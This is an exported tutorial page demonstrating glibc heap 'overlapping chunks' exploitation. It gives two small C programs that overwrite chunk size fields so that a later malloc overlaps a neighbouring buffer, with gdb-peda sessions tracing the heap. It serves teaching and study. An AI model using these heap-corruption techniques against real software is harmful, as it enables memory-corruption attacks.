Date: Thu, 28 Mar 2024 08:32:00 +0000 (UTC) Message-ID: <1642038173.931.1711614720330@instance-2.us-central1-a.c.lazenca.internal> Subject: Exported From Confluence MIME-Version: 1.0 Content-Type: multipart/related; boundary="----=_Part_930_2081239138.1711614720321" ------=_Part_930_2081239138.1711614720321 Content-Type: text/html; charset=UTF-8 Content-Transfer-Encoding: quoted-printable Content-Location: file:///C:/exported.html
<= /p>
E= xcuse the ads! We need some help to keep our site up.
This code is from the "Overlapping chunk= s flow (Top chunk)" example described earlier.
The code requests malloc for allocation of two 0x100 memory and 0x80= memory.
Use memset() to fill the letter 'B' into the memory pointed to by bu= f2, and the letter 'C' into the memory pointed to by buf3.
Then free the allocated second memory (buf2).
Overwrite the new chunk size (417) to *(buf2 - 1).
#include= <stdio.h> #include <stdlib.h> #include <string.h> #include <stdint.h> #include <unistd.h> =20 void main(){ =20 unsigned long *buf1 =3D malloc(0x100); unsigned long *buf2 =3D malloc(0x100); unsigned long *buf3 =3D malloc(0x80); =20 memset(buf2, 'B', 0x100); memset(buf3, 'C', 0x80); =20 free(buf2); =20 *(buf2 - 1) =3D 417; char *buf4 =3D malloc(408); =20 memset(buf4,'A',408); fprintf(stderr,"buf3 : %s\n", (char *)buf3); }
lazenca= 0x0@ubuntu:~/Book$ gcc -o overlapping_chunks overlapping_chunks.c=20 lazenca0x0@ubuntu:~/Book$ gdb -q ./overlapping_chunks Reading symbols from ./overlapping_chunks...(no debugging symbols found)...= done. gdb-peda$ disassemble main Dump of assembler code for function main: 0x0000000000400646 <+0>:=09push rbp 0x0000000000400647 <+1>:=09mov rbp,rsp 0x000000000040064a <+4>:=09sub rsp,0x20 0x000000000040064e <+8>:=09mov edi,0x100 0x0000000000400653 <+13>:=09call 0x400530 <malloc@plt> 0x0000000000400658 <+18>:=09mov QWORD PTR [rbp-0x20],rax 0x000000000040065c <+22>:=09mov edi,0x100 0x0000000000400661 <+27>:=09call 0x400530 <malloc@plt> 0x0000000000400666 <+32>:=09mov QWORD PTR [rbp-0x18],rax 0x000000000040066a <+36>:=09mov edi,0x80 0x000000000040066f <+41>:=09call 0x400530 <malloc@plt> 0x0000000000400674 <+46>:=09mov QWORD PTR [rbp-0x10],rax 0x0000000000400678 <+50>:=09mov rax,QWORD PTR [rbp-0x18] 0x000000000040067c <+54>:=09mov edx,0x100 0x0000000000400681 <+59>:=09mov esi,0x42 0x0000000000400686 <+64>:=09mov rdi,rax 0x0000000000400689 <+67>:=09call 0x400500 <memset@plt> 0x000000000040068e <+72>:=09mov rax,QWORD PTR [rbp-0x10] 0x0000000000400692 <+76>:=09mov edx,0x80 0x0000000000400697 <+81>:=09mov esi,0x43 0x000000000040069c <+86>:=09mov rdi,rax 0x000000000040069f <+89>:=09call 0x400500 <memset@plt> 0x00000000004006a4 <+94>:=09mov rax,QWORD PTR [rbp-0x18] 0x00000000004006a8 <+98>:=09mov rdi,rax 0x00000000004006ab <+101>:=09call 0x4004f0 <free@plt> 0x00000000004006b0 <+106>:=09mov rax,QWORD PTR [rbp-0x18] 0x00000000004006b4 <+110>:=09sub rax,0x8 0x00000000004006b8 <+114>:=09mov QWORD PTR [rax],0x1a1 0x00000000004006bf <+121>:=09mov edi,0x198 0x00000000004006c4 <+126>:=09call 0x400530 <malloc@plt> 0x00000000004006c9 <+131>:=09mov QWORD PTR [rbp-0x8],rax 0x00000000004006cd <+135>:=09mov rax,QWORD PTR [rbp-0x8] 0x00000000004006d1 <+139>:=09mov edx,0x198 0x00000000004006d6 <+144>:=09mov esi,0x41 0x00000000004006db <+149>:=09mov rdi,rax 0x00000000004006de <+152>:=09call 0x400500 <memset@plt> 0x00000000004006e3 <+157>:=09mov rax,QWORD PTR [rip+0x200976] = # 0x601060 <stderr@@GLIBC_2.2.5> 0x00000000004006ea <+164>:=09mov rdx,QWORD PTR [rbp-0x10] 0x00000000004006ee <+168>:=09mov esi,0x400794 0x00000000004006f3 <+173>:=09mov rdi,rax 0x00000000004006f6 <+176>:=09mov eax,0x0 0x00000000004006fb <+181>:=09call 0x400520 <fprintf@plt> 0x0000000000400700 <+186>:=09nop 0x0000000000400701 <+187>:=09leave =20 0x0000000000400702 <+188>:=09ret =20 End of assembler dump. gdb-peda$ b *0x0000000000400658 Breakpoint 1 at 0x400658 gdb-peda$ b *0x0000000000400666 Breakpoint 2 at 0x400666 gdb-peda$ b *0x0000000000400674 Breakpoint 3 at 0x400674 gdb-peda$ b *0x000000000040068e Breakpoint 4 at 0x40068e gdb-peda$ b *0x00000000004006a4 Breakpoint 5 at 0x4006a4 gdb-peda$ b *0x00000000004006b0 Breakpoint 6 at 0x4006b0 gdb-peda$ b *0x00000000004006b8 Breakpoint 7 at 0x4006b8 gdb-peda$ b *0x00000000004006c9 Breakpoint 8 at 0x4006c9 gdb-peda$ b *0x00000000004006e3 Breakpoint 9 at 0x4006e3 gdb-peda$
gdb-ped= a$ r Starting program: /home/lazenca0x0/Book/overlapping_chunks=20 Breakpoint 1, 0x0000000000400658 in main () gdb-peda$ i r rax rax 0x602010=090x602010 gdb-peda$ c Continuing. Breakpoint 2, 0x0000000000400666 in main () gdb-peda$ i r rax rax 0x602120=090x602120 gdb-peda$ c Continuing. Breakpoint 3, 0x0000000000400674 in main () gdb-peda$ i r rax rax 0x602230=090x602230 gdb-peda$
gdb-ped= a$ c Continuing. Breakpoint 4, 0x000000000040068e in main () gdb-peda$ x/40gx 0x602120 0x602120:=090x4242424242424242=090x4242424242424242 0x602130:=090x4242424242424242=090x4242424242424242 0x602140:=090x4242424242424242=090x4242424242424242 0x602150:=090x4242424242424242=090x4242424242424242 0x602160:=090x4242424242424242=090x4242424242424242 0x602170:=090x4242424242424242=090x4242424242424242 0x602180:=090x4242424242424242=090x4242424242424242 0x602190:=090x4242424242424242=090x4242424242424242 0x6021a0:=090x4242424242424242=090x4242424242424242 0x6021b0:=090x4242424242424242=090x4242424242424242 0x6021c0:=090x4242424242424242=090x4242424242424242 0x6021d0:=090x4242424242424242=090x4242424242424242 0x6021e0:=090x4242424242424242=090x4242424242424242 0x6021f0:=090x4242424242424242=090x4242424242424242 0x602200:=090x4242424242424242=090x4242424242424242 0x602210:=090x4242424242424242=090x4242424242424242 0x602220:=090x0000000000000000=090x0000000000000091 0x602230:=090x0000000000000000=090x0000000000000000 0x602240:=090x0000000000000000=090x0000000000000000 0x602250:=090x0000000000000000=090x0000000000000000 gdb-peda$ c Continuing. Breakpoint 5, 0x00000000004006a4 in main () gdb-peda$ x/20gx 0x602230 0x602230:=090x4343434343434343=090x4343434343434343 0x602240:=090x4343434343434343=090x4343434343434343 0x602250:=090x4343434343434343=090x4343434343434343 0x602260:=090x4343434343434343=090x4343434343434343 0x602270:=090x4343434343434343=090x4343434343434343 0x602280:=090x4343434343434343=090x4343434343434343 0x602290:=090x4343434343434343=090x4343434343434343 0x6022a0:=090x4343434343434343=090x4343434343434343 0x6022b0:=090x0000000000000000=090x0000000000020d51 0x6022c0:=090x0000000000000000=090x0000000000000000 gdb-peda$
gdb-ped= a$ c Continuing. Breakpoint 6, 0x00000000004006b0 in main () gdb-peda$ p main_arena.bins[0] $1 =3D (mchunkptr) 0x602110 gdb-peda$ p main_arena.bins[1] $2 =3D (mchunkptr) 0x602110 gdb-peda$ c Continuing. Breakpoint 7, 0x00000000004006b8 in main () gdb-peda$ x/i $rip =3D> 0x4006b8 <main+114>:=09mov QWORD PTR [rax],0x1a1 gdb-peda$ i r rax rax 0x602118=090x602118 gdb-peda$ x/gx 0x602118 0x602118:=090x0000000000000111 gdb-peda$ ni 0x00000000004006bf in main () gdb-peda$ x/gx 0x602118 0x602118:=090x00000000000001a1 gdb-peda$ p main_arena.bins[0].size=20 $3 =3D 0x1a1 gdb-peda$
Request to malloc() for an allocation of= 408 bytes of memory, the allocator reallocates the second memory that has = changed in size earlier.
The size of the reallocated memory is 0x1a0 (0x1a1-0x1), and the ran= ge of memory is 0x602120 ~ 0x6022b0.
gdb-ped= a$ c Continuing. Breakpoint 8, 0x00000000004006c9 in main () gdb-peda$ i r rax rax 0x602120=090x602120 gdb-peda$ x/2gx 0x602120 - 0x10 0x602110:=090x0000000000000000=090x00000000000001a1 gdb-peda$ p/x 0x602110 + 0x1a0 $4 =3D 0x6022b0 gdb-peda$
gdb-ped= a$ c Continuing. Breakpoint 9, 0x00000000004006e3 in main () gdb-peda$ x/60gx 0x602120 0x602120:=090x4141414141414141=090x4141414141414141 0x602130:=090x4141414141414141=090x4141414141414141 0x602140:=090x4141414141414141=090x4141414141414141 0x602150:=090x4141414141414141=090x4141414141414141 0x602160:=090x4141414141414141=090x4141414141414141 0x602170:=090x4141414141414141=090x4141414141414141 0x602180:=090x4141414141414141=090x4141414141414141 0x602190:=090x4141414141414141=090x4141414141414141 0x6021a0:=090x4141414141414141=090x4141414141414141 0x6021b0:=090x4141414141414141=090x4141414141414141 0x6021c0:=090x4141414141414141=090x4141414141414141 0x6021d0:=090x4141414141414141=090x4141414141414141 0x6021e0:=090x4141414141414141=090x4141414141414141 0x6021f0:=090x4141414141414141=090x4141414141414141 0x602200:=090x4141414141414141=090x4141414141414141 0x602210:=090x4141414141414141=090x4141414141414141 0x602220:=090x4141414141414141=090x4141414141414141 0x602230:=090x4141414141414141=090x4141414141414141 0x602240:=090x4141414141414141=090x4141414141414141 0x602250:=090x4141414141414141=090x4141414141414141 0x602260:=090x4141414141414141=090x4141414141414141 0x602270:=090x4141414141414141=090x4141414141414141 0x602280:=090x4141414141414141=090x4141414141414141 0x602290:=090x4141414141414141=090x4141414141414141 0x6022a0:=090x4141414141414141=090x4141414141414141 0x6022b0:=090x0000000000000000=090x0000000000020d51 0x6022c0:=090x0000000000000000=090x0000000000000000 0x6022d0:=090x0000000000000000=090x0000000000000000 0x6022e0:=090x0000000000000000=090x0000000000000000 0x6022f0:=090x0000000000000000=090x0000000000000000 gdb-peda$ c Continuing. buf3 : AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA= AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA [Inferior 1 (process 2790) exited with code 0210] Warning: not running gdb-peda$
#include= <stdio.h> #include <stdlib.h> #include <string.h> #include <malloc.h> #include <unistd.h> =20 int main(){ unsigned long *buf1 =3D malloc(112); unsigned long *buf2 =3D malloc(112); unsigned long *buf3 =3D malloc(112); unsigned long *buf4 =3D malloc(112); unsigned long *buf5 =3D malloc(112); =20 free(buf4); =20 *(buf2 -1) =3D 0x101; =20 free(buf2); char *buf6 =3D malloc(224); =20 memset(buf6,'C',224); fprintf(stderr,"buf3 : %s\n", (char *)buf3); }
lazenca= 0x0@ubuntu:~/Book$ gcc -o overlapping_chunks2 overlapping_chunks2.c=20 lazenca0x0@ubuntu:~/Book$ gdb -q ./overlapping_chunks2 Reading symbols from ./overlapping_chunks2...(no debugging symbols found)..= .done. gdb-peda$ disassemble main Dump of assembler code for function main: 0x0000000000400646 <+0>:=09push rbp 0x0000000000400647 <+1>:=09mov rbp,rsp 0x000000000040064a <+4>:=09sub rsp,0x30 0x000000000040064e <+8>:=09mov edi,0x70 0x0000000000400653 <+13>:=09call 0x400530 <malloc@plt> 0x0000000000400658 <+18>:=09mov QWORD PTR [rbp-0x30],rax 0x000000000040065c <+22>:=09mov edi,0x70 0x0000000000400661 <+27>:=09call 0x400530 <malloc@plt> 0x0000000000400666 <+32>:=09mov QWORD PTR [rbp-0x28],rax 0x000000000040066a <+36>:=09mov edi,0x70 0x000000000040066f <+41>:=09call 0x400530 <malloc@plt> 0x0000000000400674 <+46>:=09mov QWORD PTR [rbp-0x20],rax 0x0000000000400678 <+50>:=09mov edi,0x70 0x000000000040067d <+55>:=09call 0x400530 <malloc@plt> 0x0000000000400682 <+60>:=09mov QWORD PTR [rbp-0x18],rax 0x0000000000400686 <+64>:=09mov edi,0x70 0x000000000040068b <+69>:=09call 0x400530 <malloc@plt> 0x0000000000400690 <+74>:=09mov QWORD PTR [rbp-0x10],rax 0x0000000000400694 <+78>:=09mov rax,QWORD PTR [rbp-0x18] 0x0000000000400698 <+82>:=09mov rdi,rax 0x000000000040069b <+85>:=09call 0x4004f0 <free@plt> 0x00000000004006a0 <+90>:=09mov rax,QWORD PTR [rbp-0x28] 0x00000000004006a4 <+94>:=09sub rax,0x8 0x00000000004006a8 <+98>:=09mov QWORD PTR [rax],0x101 0x00000000004006af <+105>:=09mov rax,QWORD PTR [rbp-0x28] 0x00000000004006b3 <+109>:=09mov rdi,rax 0x00000000004006b6 <+112>:=09call 0x4004f0 <free@plt> 0x00000000004006bb <+117>:=09mov edi,0xe0 0x00000000004006c0 <+122>:=09call 0x400530 <malloc@plt> 0x00000000004006c5 <+127>:=09mov QWORD PTR [rbp-0x8],rax 0x00000000004006c9 <+131>:=09mov rax,QWORD PTR [rbp-0x8] 0x00000000004006cd <+135>:=09mov edx,0xe0 0x00000000004006d2 <+140>:=09mov esi,0x43 0x00000000004006d7 <+145>:=09mov rdi,rax 0x00000000004006da <+148>:=09call 0x400500 <memset@plt> 0x00000000004006df <+153>:=09mov rax,QWORD PTR [rip+0x20097a] = # 0x601060 <stderr@@GLIBC_2.2.5> 0x00000000004006e6 <+160>:=09mov rdx,QWORD PTR [rbp-0x20] 0x00000000004006ea <+164>:=09mov esi,0x400794 0x00000000004006ef <+169>:=09mov rdi,rax 0x00000000004006f2 <+172>:=09mov eax,0x0 0x00000000004006f7 <+177>:=09call 0x400520 <fprintf@plt> 0x00000000004006fc <+182>:=09mov eax,0x0 0x0000000000400701 <+187>:=09leave =20 0x0000000000400702 <+188>:=09ret =20 End of assembler dump. gdb-peda$ b *0x0000000000400658 Breakpoint 1 at 0x400658 gdb-peda$ b *0x0000000000400666 Breakpoint 2 at 0x400666 gdb-peda$ b *0x0000000000400674 Breakpoint 3 at 0x400674 gdb-peda$ b *0x0000000000400682 Breakpoint 4 at 0x400682 gdb-peda$ b *0x0000000000400690 Breakpoint 5 at 0x400690 gdb-peda$ b *0x00000000004006a0 Breakpoint 6 at 0x4006a0 gdb-peda$ b *0x00000000004006a8 Breakpoint 7 at 0x4006a8 gdb-peda$ b *0x00000000004006bb Breakpoint 8 at 0x4006bb gdb-peda$ b *0x00000000004006c5 Breakpoint 9 at 0x4006c5 gdb-peda$ b *0x00000000004006df Breakpoint 10 at 0x4006df gdb-peda$
gdb-ped= a$ r Starting program: /home/lazenca0x0/Book/overlapping_chunks2=20 Breakpoint 1, 0x0000000000400658 in main () gdb-peda$ i r rax rax 0x602010=090x602010 gdb-peda$ c Continuing. Breakpoint 2, 0x0000000000400666 in main () gdb-peda$ i r rax rax 0x602090=090x602090 gdb-peda$ c Continuing. Breakpoint 3, 0x0000000000400674 in main () gdb-peda$ i r rax rax 0x602110=090x602110 gdb-peda$ c Continuing. Breakpoint 4, 0x0000000000400682 in main () gdb-peda$ i r rax rax 0x602190=090x602190 gdb-peda$ c Continuing. Breakpoint 5, 0x0000000000400690 in main () gdb-peda$ i r rax rax 0x602210=090x602210 gdb-peda$
After the fourth memory was freed the ch= unk was placed fastbinsY[6].
Change the size value of the second memory to 0x101.
gdb-ped= a$ c Continuing. Breakpoint 6, 0x00000000004006a0 in main () gdb-peda$ p main_arena.fastbinsY[6] $3 =3D (mfastbinptr) 0x602180 gdb-peda$ c Continuing. Breakpoint 7, 0x00000000004006a8 in main () gdb-peda$ x/i $rip =3D> 0x4006a8 <main+98>:=09mov QWORD PTR [rax],0x101 gdb-peda$ i r rax rax 0x602088=090x602088 gdb-peda$ x/gx 0x602088 0x602088:=090x0000000000000081 gdb-peda$ ni 0x00000000004006af in main () gdb-peda$ x/gx 0x602088 0x602088:=090x0000000000000101 gdb-peda$
gdb-ped= a$ c Continuing. Breakpoint 8, 0x00000000004006bb in main () gdb-peda$ p main_arena.bins[0] $4 =3D (mchunkptr) 0x602080 gdb-peda$ p main_arena.bins[1] $5 =3D (mchunkptr) 0x602080 gdb-peda$ p main_arena.bins[0].size $6 =3D 0x101 gdb-peda$ c Continuing. Breakpoint 9, 0x00000000004006c5 in main () gdb-peda$ i r rax rax 0x602090=090x602090 gdb-peda$ x/2gx 0x602090 - 0x10 0x602080:=090x0000000000000000=090x0000000000000101 gdb-peda$ p/x 0x602090 + 0x100 $7 =3D 0x602190 gdb-peda$
gdb-ped= a$ c Continuing. Breakpoint 10, 0x00000000004006df in main () gdb-peda$ x/40gx 0x602090 0x602090:=090x4343434343434343=090x4343434343434343 0x6020a0:=090x4343434343434343=090x4343434343434343 0x6020b0:=090x4343434343434343=090x4343434343434343 0x6020c0:=090x4343434343434343=090x4343434343434343 0x6020d0:=090x4343434343434343=090x4343434343434343 0x6020e0:=090x4343434343434343=090x4343434343434343 0x6020f0:=090x4343434343434343=090x4343434343434343 0x602100:=090x4343434343434343=090x4343434343434343 0x602110:=090x4343434343434343=090x4343434343434343 0x602120:=090x4343434343434343=090x4343434343434343 0x602130:=090x4343434343434343=090x4343434343434343 0x602140:=090x4343434343434343=090x4343434343434343 0x602150:=090x4343434343434343=090x4343434343434343 0x602160:=090x4343434343434343=090x4343434343434343 0x602170:=090x0000000000000000=090x0000000000000000 0x602180:=090x0000000000000100=090x0000000000000081 0x602190:=090x0000000000000000=090x0000000000000000 0x6021a0:=090x0000000000000000=090x0000000000000000 0x6021b0:=090x0000000000000000=090x0000000000000000 0x6021c0:=090x0000000000000000=090x0000000000000000 gdb-peda$ c Continuing. buf3 : CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC= CCCCCCCCCCCCCCCCCCCCCCCCCCCC [Inferior 1 (process 3085) exited normally] Warning: not running gdb-peda$
<= /p>